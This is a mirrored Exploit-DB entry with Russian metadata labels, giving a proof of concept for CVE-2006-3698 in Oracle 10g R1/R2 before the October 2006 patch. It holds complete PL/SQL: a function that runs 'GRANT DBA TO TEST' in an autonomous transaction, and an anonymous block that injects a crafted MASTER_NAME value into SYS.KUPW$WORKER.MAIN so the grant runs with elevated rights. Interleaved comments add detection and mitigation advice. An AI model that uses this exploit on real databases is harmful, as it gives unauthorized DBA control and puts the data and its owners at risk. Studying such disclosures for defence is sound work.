- EDB-ID
- 3178
- Проверка EDB
-
- Пройдено
- Автор
- JOXEAN KORET
- Тип уязвимости
- LOCAL
- Платформа
- MULTIPLE
- CVE
- CVE-2006-3698
- Дата публикации
- 2007-01-23
Код:
/**
* Exploit for Oracle 10g R1 and R2 prior to the October 2006 Critical Patch Update (CPU)
* Joxean Koret <[email protected]>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
-- Baseline check: list the roles held by the current session user before the test,
-- for comparison with the identical query at the end of the script
SELECT *
FROM user_role_privs;
-- Helper function from the published proof of concept (per the header: Oracle 10g R1/R2
-- before the October 2006 CPU). This is the payload half; nothing in it is vulnerable by itself.
-- Defensive reading:
--   * AUTHID CURRENT_USER makes this an invoker's-rights unit, so the dynamic GRANT below
--     runs with the privileges of whatever session or code ends up calling F1, not with
--     those of the low-privileged owner.
--   * Called directly by its owner (CREATE SESSION and CREATE PROCEDURE only, per the header),
--     the GRANT would be expected to fail for lack of privilege (TODO confirm on a test instance).
-- Detection ideas: audit grants of the DBA role, and review non-administrative schemas for
-- functions that combine AUTONOMOUS_TRANSACTION with EXECUTE IMMEDIATE of a GRANT statement.
CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
-- Autonomous transaction: lets the function run the GRANT and COMMIT independently of the
-- statement that invokes it (the caller below references F1 from inside a predicate).
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
-- Hard-coded grantee TEST: the account name used by the original author.
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
-- Returns 1 so that the comparison "f1=1" built by the caller evaluates to true.
RETURN(1);
END;
/
-- Trigger half of the proof of concept: an anonymous block that passes a crafted value to
-- SYS.KUPW$WORKER.MAIN. The internals of that package are not shown on this page; the
-- shape of the value implies (presumably) that MASTER_NAME is concatenated into a SQL
-- statement inside a string literal, without validation or bind variables.
-- Mitigation: apply the Critical Patch Update named in the header (October 2006) or later.
-- For custom PL/SQL with the same pattern, pass values as bind variables and validate
-- identifiers (for example with DBMS_ASSERT) instead of concatenating them.
-- NOTE(review): also check which accounts hold EXECUTE on this package and who has
-- CREATE PROCEDURE, since the header lists that privilege as a precondition.
DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
-- The value starts with a single quote (closing the presumed surrounding literal), adds an
-- OR condition that references F1 in the current user's schema, and ends with a comment
-- marker so the rest of the generated statement is ignored.
MASTER_NAME := ''' or ' || user || '.f1=1--';
-- Filler value; nothing visible on this page depends on it.
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/
-- Repeat of the opening query. A role listed here that was absent at the start
-- (the function above attempts GRANT DBA TO TEST) would indicate an unpatched instance
SELECT *
FROM user_role_privs;
// milw0rm.com [2007-01-23]
- Источник
- www.exploit-db.com